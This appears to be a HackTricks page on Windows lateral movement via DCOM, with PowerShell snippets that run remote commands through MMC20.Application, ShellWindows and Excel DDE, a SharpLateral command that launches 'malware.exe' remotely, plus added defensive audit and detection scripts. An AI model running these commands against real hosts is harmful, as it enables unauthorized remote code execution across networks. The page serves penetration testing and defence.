hacktricks/windows-hardening/lateral-movement/dcom-exec.md
2024-02-10 17:52:19 +00:00


DCOM Exec

```powershell
Get-CimInstance Win32_DCOMApplication
```

DCOM Exec

The COM object MMC Application Class (MMC20.Application) enables scripting of MMC snap-in operations. Notably, this object exposes an ExecuteShellCommand method under Document.ActiveView. More information about this method can be found here. Check it running:

This feature facilitates the execution of commands over a network through a DCOM application. To interact with DCOM remotely as an admin, PowerShell can be utilized as follows:

```powershell
[activator]::CreateInstance([type]::GetTypeFromProgID("<DCOM_ProgID>", "<IP_Address>"))
```

Check methods:

```powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
$com.Document.ActiveView | Get-Member
```

The pieces involved:

  1. DCOM (Distributed Component Object Model) is a protocol that allows software components to communicate across a network. It is used for remote procedure calls (RPC) between Windows machines, and it can be used for lateral movement in a network.
  2. ExecuteShellCommand is a method that can be invoked on the COM object to execute a shell command on the remote host, which lets an attacker run arbitrary commands on the target machine.
  3. The remote host is the target machine that the attacker wants to compromise or gain access to.
  4. Process execution means running a command or program on the remote host; an attacker can use it to run malicious scripts, install backdoors, or carry out other techniques.

By understanding these pieces, an attacker can leverage DCOM and the ExecuteShellCommand method to execute commands on a remote host and potentially gain unauthorized access to the target system.

Get RCE:


```powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
$com | Get-Member

# Then just run something like:

ls \\10.10.10.10\c$\Users
```

ShellWindows & ShellBrowserWindow

For more info about this technique check the original post https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

The MMC20.Application object was identified to lack explicit "LaunchPermissions", defaulting to permissions that permit Administrators access. For further details, a thread can be explored here, and the use of @tiraniddo's OleView .NET for filtering objects without explicit Launch Permission is recommended.

Two specific objects, ShellBrowserWindow and ShellWindows, were highlighted due to their lack of explicit Launch Permissions. The absence of a LaunchPermission registry entry under HKCR:\AppID\{guid} signifies no explicit permissions.
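The same check can be done without OleView .NET from an administrative PowerShell on the host being audited. The script below is an added example for this page (it is not code from HackTricks, OleView .NET or the referenced posts): it walks HKCR:\AppID for GUID keys that carry no LaunchPermission value, joins them with the names from Win32_DCOMApplication, and then decodes the machine-wide DefaultLaunchPermission security descriptor that such objects fall back to, so an administrator can see which principals hold remote launch or activation rights. The COM_RIGHTS_* bit values are the ones defined in the Windows SDK; the function names are this example's own.

```powershell
# Added example (not from HackTricks or OleView .NET): audit DCOM AppIDs that rely on the
# machine-wide default launch ACL, and show what that default grants. Run elevated.

# COM launch/activation rights as defined in the Windows SDK (COM_RIGHTS_* values)
$ComRights = [ordered]@{ 1 = 'Execute'; 2 = 'LocalLaunch'; 4 = 'RemoteLaunch'; 8 = 'LocalActivation'; 16 = 'RemoteActivation' }

function ConvertTo-ComRightNames {
    param([int]$AccessMask)
    ($ComRights.Keys | Where-Object { $AccessMask -band $_ } | ForEach-Object { $ComRights[$_] }) -join ','
}

function Get-DcomAppIdWithoutLaunchPermission {
    # Map AppID GUID -> friendly name using the same WMI class used above to list DCOM applications
    $names = @{}
    Get-CimInstance Win32_DCOMApplication | ForEach-Object { $names[$_.AppID] = $_.Name }

    # HKCR is not a default PowerShell drive, so address it through the Registry:: provider
    Get-ChildItem -Path 'Registry::HKEY_CLASSES_ROOT\AppID' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -like '{*}' } |      # GUID-named keys only, skip ProgID aliases
        ForEach-Object {
            $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
            # No LaunchPermission value: the AppID inherits HKLM\SOFTWARE\Microsoft\Ole\DefaultLaunchPermission
            if ($null -eq $props.LaunchPermission) {
                [PSCustomObject]@{
                    AppID     = $_.PSChildName
                    Name      = $names[$_.PSChildName]
                    RunAs     = $props.RunAs
                    Surrogate = $props.DllSurrogate
                }
            }
        }
}

function Get-DcomDefaultLaunchAcl {
    $ole = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Ole'
    if ($null -eq $ole.DefaultLaunchPermission) { return }   # value absent: the OS built-in default applies
    # REG_BINARY holds a self-relative security descriptor; parse it and walk the DACL
    $sd = [System.Security.AccessControl.RawSecurityDescriptor]::new([byte[]]$ole.DefaultLaunchPermission, 0)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [System.Security.AccessControl.KnownAce]) { continue }
        $principal = $ace.SecurityIdentifier.Value
        try { $principal = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value } catch { }
        [PSCustomObject]@{
            Type      = $ace.AceType
            Principal = $principal
            Rights    = ConvertTo-ComRightNames -AccessMask $ace.AccessMask
        }
    }
}

$noExplicit = Get-DcomAppIdWithoutLaunchPermission
"{0} AppIDs rely on the default launch ACL" -f @($noExplicit).Count
# Show the objects discussed on this page first (MMC Application Class, ShellWindows, ShellBrowserWindow)
$noExplicit | Where-Object { $_.Name -match 'MMC|Shell' } | Format-Table -AutoSize
"Default launch ACL (HKLM\SOFTWARE\Microsoft\Ole\DefaultLaunchPermission):"
Get-DcomDefaultLaunchAcl | Format-Table -AutoSize
```

Any AppID in the first list is only as protected as the decoded default ACL; an entry granting RemoteLaunch or RemoteActivation to a broad group is the condition the text above describes. Giving such an AppID its own LaunchPermission (via dcomcnfg or by writing the value) narrows it without touching the machine-wide default.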

ShellWindows

For ShellWindows, which lacks a ProgID, the .NET methods Type.GetTypeFromCLSID and Activator.CreateInstance facilitate object instantiation using its AppID. This process leverages OleView .NET to retrieve the CLSID for ShellWindows. Once instantiated, interaction is possible through the WindowsShell.Item method, leading to method invocation like Document.Application.ShellExecute.

Example PowerShell commands were provided to instantiate the object and execute commands remotely:

```powershell
$com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.Item()
$item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\system32", $null, 0)
```

Lateral Movement with Excel DCOM Objects

Lateral movement can be achieved by exploiting DCOM Excel objects. For detailed information, it's advisable to read the discussion on leveraging Excel DDE for lateral movement via DCOM at Cybereason's blog.

The Empire project provides a PowerShell script, which demonstrates the utilization of Excel for remote code execution (RCE) by manipulating DCOM objects. Below are snippets from the script available on Empire's GitHub repository, showcasing different methods to abuse Excel for RCE:


```powershell
# Detection of Office version
elseif ($Method -Match "DetectOffice") {
    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
    $Obj = [System.Activator]::CreateInstance($Com)
    $isx64 = [boolean]$obj.Application.ProductCode[21]
    Write-Host  $(If ($isx64) {"Office x64 detected"} Else {"Office x86 detected"})
}
# Registration of an XLL
elseif ($Method -Match "RegisterXLL") {
    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
    $Obj = [System.Activator]::CreateInstance($Com)
    $obj.Application.RegisterXLL("$DllPath")
}
# Execution of a command via Excel DDE
elseif ($Method -Match "ExcelDDE") {
    $Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
    $Obj = [System.Activator]::CreateInstance($Com)
    $Obj.DisplayAlerts = $false
    $Obj.DDEInitiate("cmd", "/c $Command")
}
```
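From the defender's side, the MMC20.Application and Excel.Application techniques above share one footprint: the COM server is out-of-process, so a remote activation makes the DcomLaunch service host start mmc.exe or excel.exe with the -Embedding switch, and the command that ExecuteShellCommand or DDEInitiate runs appears as a child of that server. The script below is an added example for this page (not code from HackTricks, Empire, or the enigma0x3/Cybereason posts) that applies those two rules to process-creation records. The field names follow Sysmon Event ID 1 / 4688-style logs, the events are constructed by hand for the demo, and the function name is this example's own.

```powershell
# Added example (not from HackTricks or Empire): flag the process trees left behind by
# DCOM-based execution through MMC20.Application and Excel.Application.

$SampleEvents = @(
    # constructed: remote MMC20.Application activation
    [PSCustomObject]@{ Time = '2024-02-10T17:52:19Z'; Computer = 'WS01'
        Image = 'C:\Windows\System32\mmc.exe'; CommandLine = '"C:\Windows\System32\mmc.exe" -Embedding'
        ParentImage = 'C:\Windows\System32\svchost.exe'; ParentCommandLine = 'C:\Windows\system32\svchost.exe -k DcomLaunch -p' }
    # constructed: the ExecuteShellCommand step, cmd.exe under that mmc.exe
    [PSCustomObject]@{ Time = '2024-02-10T17:52:20Z'; Computer = 'WS01'
        Image = 'C:\Windows\System32\cmd.exe'; CommandLine = 'cmd /c whoami'
        ParentImage = 'C:\Windows\System32\mmc.exe'; ParentCommandLine = '"C:\Windows\System32\mmc.exe" -Embedding' }
    # constructed: remote Excel.Application activation
    [PSCustomObject]@{ Time = '2024-02-10T17:53:02Z'; Computer = 'WS02'
        Image = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
        CommandLine = '"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" /automation -Embedding'
        ParentImage = 'C:\Windows\System32\svchost.exe'; ParentCommandLine = 'C:\Windows\system32\svchost.exe -k DcomLaunch -p' }
    # constructed: benign, an administrator opened Event Viewer from the desktop
    [PSCustomObject]@{ Time = '2024-02-10T17:55:41Z'; Computer = 'WS01'
        Image = 'C:\Windows\System32\mmc.exe'; CommandLine = '"C:\Windows\System32\mmc.exe" eventvwr.msc'
        ParentImage = 'C:\Windows\explorer.exe'; ParentCommandLine = 'C:\Windows\Explorer.EXE' }
)

function Get-DcomExecutionIndicator {
    param([Parameter(Mandatory)][psobject]$Record)

    $image  = [IO.Path]::GetFileName($Record.Image).ToLowerInvariant()
    $parent = [IO.Path]::GetFileName($Record.ParentImage).ToLowerInvariant()

    # Out-of-process COM servers activated through DCOM are started by the DcomLaunch service
    # host with -Embedding; a user opening the same binary from explorer.exe looks different.
    $launchedByDcom = ($parent -eq 'svchost.exe') -and
                      ($Record.ParentCommandLine -match 'DcomLaunch') -and
                      ($Record.CommandLine -match '-Embedding')

    if ($launchedByDcom -and $image -eq 'mmc.exe')   { return 'MMC20.Application activated via DCOM' }
    if ($launchedByDcom -and $image -eq 'excel.exe') { return 'Excel.Application activated via DCOM' }

    # The ExecuteShellCommand / DDEInitiate step itself: a shell whose parent is the COM server
    $shells = 'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'
    if (($image -in $shells) -and ($parent -in 'mmc.exe', 'excel.exe')) {
        return "shell spawned by COM automation server $parent"
    }
    return $null
}

$SampleEvents | ForEach-Object {
    $indicator = Get-DcomExecutionIndicator -Record $_
    if ($indicator) {
        [PSCustomObject]@{ Time = $_.Time; Computer = $_.Computer; Image = $_.Image; Indicator = $indicator }
    }
} | Format-Table -AutoSize
```

The first three constructed records are flagged and the interactive Event Viewer launch is not. ShellWindows and ShellBrowserWindow do not fit these rules: they live inside the already running explorer.exe, so a ShellExecute issued through them appears as a child of explorer.exe like any user-started program. For those, correlate the child process with a network logon (4624, logon type 3) from the source host shortly before it, since the DCOM activation still has to authenticate.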

Automation Tools for Lateral Movement

Two tools are highlighted for automating these techniques:

  • Invoke-DCOM.ps1: A PowerShell script provided by the Empire project that simplifies the invocation of different methods for executing code on remote machines. This script is accessible at the Empire GitHub repository.

  • SharpLateral: A tool designed for executing code remotely, which can be used with the command:

```bash
SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
```

